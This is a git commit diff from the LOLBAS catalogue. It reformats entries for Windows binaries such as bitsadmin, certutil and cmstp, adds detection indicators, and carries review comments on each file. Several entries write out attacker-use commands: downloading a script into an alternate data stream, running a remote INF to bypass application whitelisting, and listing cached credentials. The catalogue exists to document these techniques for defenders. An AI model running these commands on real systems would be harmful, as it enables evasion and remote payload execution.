Update readme, began updating OSBins with new template

This commit is contained in:
Oddvar Moe
2018-09-24 01:50:14 +02:00
parent e8c7042468
commit adafa6de3f
17 changed files with 234 additions and 121 deletions

View File

@@ -1,20 +1,29 @@
---
Name: Atbroker.exe
Description: Execute
Author: ''
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\Atbroker.exe
- C:\Windows\SysWOW64\Atbroker.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\Atbroker.exe
- path: C:\Windows\SysWOW64\Atbroker.exe
Code Sample:
- Code:
Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Notes: >
Thanks to Adam - @hexacorn
Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---
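Review bot: "Assistibe Technology" is misspelled in both the Usecase line and the Notes block of this file; it should read "Assistive Technology", and since the Notes sentence repeats the Usecase sentence word for word, one of the two can go. The `Code Sample:` list with a single `- Code:` item yields a list containing one null entry under most YAML parsers; if there is no sample, `Code Sample: []` (the form the old template used) is less surprising to consumers of the data. The registry IOCs under Detection are the useful part of this change: both `Accessibility\Configuration` and `Accessibility\ATs` keys live under HKCU, so monitoring should cover per-user hives, not just HKLM.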

View File

@@ -1,17 +1,35 @@
---
Name: Bash.exe
Description: Execute
Author: ''
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: bash.exe -c calc.exe
Description: Execute calc.exe.
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path:
- '?'
Code Sample: []
Detection: []
- path: C:\Windows\System32\bash.exe
- path: C:\Windows\SysWOW64\bash.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from bash.exe
Resources:
- ''
Notes: Thanks to ?
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Acknowledgement:
- Person: Alex Ionescu
Handle: '@aionescu'
---
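Review bot: The two command entries are byte-identical (`bash.exe -c calc.exe`) and differ only in Category ("Execute" vs "AWL Bypass"); if the template allows one command to carry several categories, collapse them, otherwise the second Description should at least say what distinguishes the entries. Category spelling should also match across files: this file uses "AWL Bypass" while the Cmstp.exe file in the same commit uses "AwL bypass". The Full Path entries replace the old `'?'` placeholder, which is a good fix; note for detection purposes that bash.exe is only present when the Windows Subsystem for Linux feature is installed, so the single IOC "Child process from bash.exe" is easiest to act on where WSL is not expected at all.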

View File

@@ -1,36 +1,59 @@
---
Name: Bitsadmin.exe
Description: Execute, Download, Copy, Read ADS
Author: ''
Name: bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
- Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: Command for copying cmd.exe to another folder
Usecase: Copy file
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Execute binary file specified. Can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\Windows\System32\bitsadmin.exe
- c:\Windows\SysWOW64\bitsadmin.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\bitsadmin.exe
- path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from bitsadmin.exe
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources:
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Slide 53
- https://www.youtube.com/watch?v=_8xJaaQlpBo
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Rob Fuller
Handle: '@mubix'
- Person: Chris Gates
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---
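Review bot: The two multi-line `|` block commands were collapsed into single lines without `&` separators (the `bitsadmin /create 1 bitsadmin /addfile 1 ...` entries for the Alternate data streams and Download categories), so they are no longer valid command lines, unlike the `&`-joined one-liners used for the Copy and Execute entries; either restore the `|` block form or join the steps with `&`. The Description for the Download entry was copy-pasted from the cmd.exe entry ("add cmd.exe to the job") although that command downloads autoruns.exe from live.sysinternals.com. The first Resources item appends " - slide 53" to the URL string; keeping the URL clean and moving the slide reference elsewhere avoids breaking any tooling that renders `Link:` values as hyperlinks.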

View File

@@ -1,25 +1,56 @@
---
Name: Certutil.exe
Description: Download, Add ADS, Decode, Encode
Author: ''
Description: Windows binary used for handeling certificates
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
- Command: |
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Description: Commands to encode and decode a file using Base64.
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\certutil.exe
- c:\windows\sysWOW64\certutil.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\certutil.exe
- path: C:\Windows\SysWOW64\certutil.exe
Code Sample:
- Code:
Detection:
- IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072
Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- Link: https://twitter.com/mattifestation/status/620107926288515072
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Moriarty
Handle: '@moriarty2016'
---
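Review bot: "handeling" in the Description should be "handling". The Alternate data streams entry here is tagged MitreID T1105, while the equivalent ADS entry in the bitsadmin.exe file in this same commit is tagged T1096; the two should use the same technique ID for the same category. The Acknowledgement handle '@moriarty2016' does not match the Twitter account in the Resources link (twitter.com/Moriarty_Meng), so one of the two is worth double-checking. The two user-agent IOCs (Microsoft-CryptoAPI/10.0 and "CertUtil URL Agent") are the most actionable additions in this hunk and are worth keeping exactly as written.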

View File

@@ -1,18 +1,28 @@
---
Name: Cmdkey.exe
Description: Credentials
Author: ''
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmdkey /list
Description: List cached credentials.
Description: List cached credentials
Usecase: Get credential information from host
Category: Credentials
Privileges: User
MitreID: T1078
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\cmdkey.exe
- c:\windows\sysWOW64\cmdkey.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\cmdkey.exe
- path: C:\Windows\SysWOW64\cmdkey.exe
Code Sample:
- Code:
Detection:
- IOC: Usage of this command could be and IOC
Resources:
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Notes: ''
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:
---
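Review bot: The Detection entry "Usage of this command could be and IOC" has a typo ("an IOC") and says nothing a detection engineer can act on; stating the observable directly, e.g. "cmdkey.exe /list executed by a non-administrative user", would match the style of the IOC lines in the other files. The Acknowledgement list contains an entry with empty `Person:` and `Handle:` values; if nobody is credited, omit the entry rather than leaving null fields. The Description also starts with a lowercase "creates", unlike the other files in this commit.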

View File

@@ -1,26 +1,43 @@
---
Name: Cmstp.exe
Description: Execute, UACBypass
Author: ''
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\system32\cmstp.exe
- C:\Windows\sysWOW64\cmstp.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\cmstp.exe
- path: C:\Windows\SysWOW64\cmstp.exe
Code Sample:
- Code:
Detection:
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
- IOC: Cmstp.exe communication towards internet and getting files
Resources:
- https://twitter.com/NickTyrer/status/958450014111633408
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
(UAC Bypass)
- https://github.com/hfiref0x/UACME
Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
- Link: https://twitter.com/NickTyrer/status/958450014111633408
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---
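Review bot: The old Description listed "UACBypass" and Resources carried both the UACBypassCMSTP.ps1 gist and the hfiref0x/UACME link; the new version keeps the gist link but drops the UACME link and has no command entry covering that category, so the information is silently lost. Either carry the link over or state that it was removed on purpose. Category spelling "AwL bypass" should match "AWL Bypass" as used in the Bash.exe file. The first IOC ("Execution of cmstp.exe should not be normal unless VPN is in use") is a sound baseline, and the second could be tightened to name the observable, e.g. cmstp.exe making outbound HTTP(S) connections to fetch a remote .INF.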